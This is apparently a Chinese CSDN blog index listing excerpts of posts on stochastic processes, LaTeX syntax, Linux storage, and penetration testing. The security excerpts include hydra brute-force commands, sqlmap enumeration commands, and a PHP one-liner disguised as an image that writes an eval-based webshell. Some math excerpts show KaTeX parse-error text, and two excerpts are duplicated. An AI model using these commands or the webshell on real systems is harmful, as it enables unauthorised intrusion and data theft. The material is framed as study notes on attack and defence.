Replyme-优快云博客

原创随机过程（三）——随机过程导论（下）

条件数学期望是随机数学中最基本最重要的概念之一，它在随机过程课程中具有广泛的应用，需要同学们很好地掌握。对于离散型的随机变量 XXX 和 Y(Y(Y( 取值范围分别是 I\mathcal{I}I 和 J)\mathcal{J})J) ，随机变量 YYY 在 ${X=\mathrm{x}} $ 下的条件概率分布是KaTeX parse error: No such environment: align* at position 8: \begin{̲a̲l̲i̲g̲n̲*̲}̲\forall j \in

2022-06-30 08:29:47 1618

原创随机过程（二）——随机过程导论（中）

条件数学期望是随机数学中最基本最重要的概念之一，它在随机过程课程中具有广泛的应用，需要同学们很好地掌握。对于离散型的随机变量 XXX 和 Y(Y(Y( 取值范围分别是 I\mathcal{I}I 和 J)\mathcal{J})J) ，随机变量 YYY 在 ${X=\mathrm{x}} $ 下的条件概率分布是KaTeX parse error: No such environment: align* at position 8: \begin{̲a̲l̲i̲g̲n̲*̲}̲\forall j \in

2022-06-30 08:29:17 325

原创随机过程（一）——随机过程导论（上）

孙应飞，博士（后），中国科学院大学教授，博士生导师工作单位中国科学院大学信息科学与工程学院课程链接随机过程孙应飞_哔哩哔哩_bilibili概率论与数理统计、复变函数、常微分方程、信号与系统教材陆大金《随机过程及其应用》，清华大学出版社主要参考书林元烈《应用随机过程》，清华大学出版社复旦大学编《概率论第三册随机过程》，高等教育出版社随机变量从样本空间到实数域的单值映射样本空间随机试验所有可能的结果的集合N维随机变量极限定理无穷多个随机变量随机过程研究一族无穷多个、相互有关的随机变量定

2022-06-30 08:28:46 1045

原创 LaTeX公式语法大全

行内公式：$$块间公式：快捷键 Ctrl+Shift+M 或 $$ 回车可用于矢量加粗 α\boldsymbol{\alpha}α R\mathbb{R}R R\mathcal{R}R R\mathscr{R}R清除字母斜体，即使用罗马字体其他的字体还有：　　罗马体　　意大利体　　黑体　花体　　倾斜体　　等线体　数学斜体　　打字机字体　　小体大写字母± ：× ：÷：∣：∼\sim∼：⋅：KaTeX parse error: Undefined control sequence: \bigdot

2022-06-26 16:14:13 7627 1

原创渗透测试笔记（七）——SSH密码被暴力破解及防御

hydra：希腊神话中的九头蛇，传说有九头，斩一头，生两头hydra是世界顶级密码暴力破解工具，支持几乎所有协议的在线密码破解，功能强大，密码能否被批结破解取决于字典是否足够强大 hydra -l user -P passlist.txt ftp://192.168.0.1 hydra -L userlist -P imap://192.168.0.1/PLAIN hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS

2022-06-21 15:26:32 1093

原创渗透测试笔记（五）——XSS跨站脚本攻击

XSS：Cross Site Scripting（跨站脚本）为了避免与CSS混淆，所以简称XSS。XSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点，进而添加一些代码，嵌入到Web页面中去，使别的用户访问都会执行相应的嵌入代码。从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。XSS攻击的危害盗取各类用户账号，如机器登录账号、用户网银账号、各类管理员账号控制企业数据，包括读取、篡改、添加、删除企业敏感数据的能力盗窃企业重要的具有商业价值的资料非法转账

2022-06-12 15:51:46 1120

原创渗透测试笔记（四）——SQL注入攻击及防御（2）

sqlmap -u "URL" -dbms=mysql --batch sqlmap -u "URL" --dbs sqlmap -u "URL" --users sqlmap -u "URL" --current-user # 获得当前数据库 sqlmap -u "URL" --current-db &n

2022-06-06 22:33:27 524

原创渗透测试笔记（三）——SQL注入攻击及防御（1）

程序没有细致的过滤用户输入的数据，致使非法数据侵入系统。1、对于Web应用程序而言，用户核心数据存储在数据库中，例如MySQL、SQL Server、Oracle等；2、通过SQL注入攻击，可以获取、修改、删除数据库信息，并且通过提权来控制Web服务器等其他操作；3、SQL注入即攻击者通过构造特殊的SQL语句，入侵目标系统，致使后台数据库泄露数据的过程；4、因为SQL注入漏洞造成的严重危害性，所以常年稳居OWASP TOP10榜首。危害：1、拖库导致用户数据泄露；2、危害Web等应用的安全；3、失去操作系统

2022-06-06 22:32:21 948

原创渗透测试笔记（二）——文件包含漏洞

<?php $file = $_GET['page']; //The page we wish to display ?>本地文件包含+webshell制作一句话图片木马 cmd.jpg <?php fputs(fopen("shell.php","w"),"<?php eval($_POST[cmd]);?>")

2022-06-06 22:28:48 160

原创渗透测试笔记（一）——文件上传漏洞渗透及防御

测试渗透机：Kali-Linux-2021.4a-vmware-amd64目标靶机：OWASP Broken Web Application VM 1.2 如果恶意文件如PHP、ASP等执行文件绕过Web应用并顺利执行，则相当于黑客拿到了Webshell。一旦黑客拿到Webshell，则可以拿到Web应用数据，删除Web文件，本地提权，进一步拿下整个服务器甚至内网。SQL注入攻击对象是数据库服务，文件上传漏洞主要攻击Web服务，实际渗透两种相结合，达到对目标的深度控制。下面是一个文件上传界面，可以上传图像，

2022-06-06 22:26:43 1082

原创 Linux基础（四）——存储管理与文件查找、打包及压缩

由多个盘片组成扇区（Sector）：传统512B，现在4KB以前是按照柱面为单位进行分区的，现在以扇区为单位进行分区读取数据过程比较缓慢IDE – SATA(Serial ATA)SCSI – SAS(Serial Attached SCSI)串行连接SCSIother – PCIE FC物理硬盘： /dev/sd[a-z]KVM虚拟化：/dev/vd[a-z] （半虚拟化驱动）/dev/sd[a-z] （全虚拟化驱动）KVM增加硬盘半虚拟化驱动磁盘：online全虚拟化驱动磁盘：offlineHP服务器磁

2022-06-06 21:54:09 157

m0_67044952的博客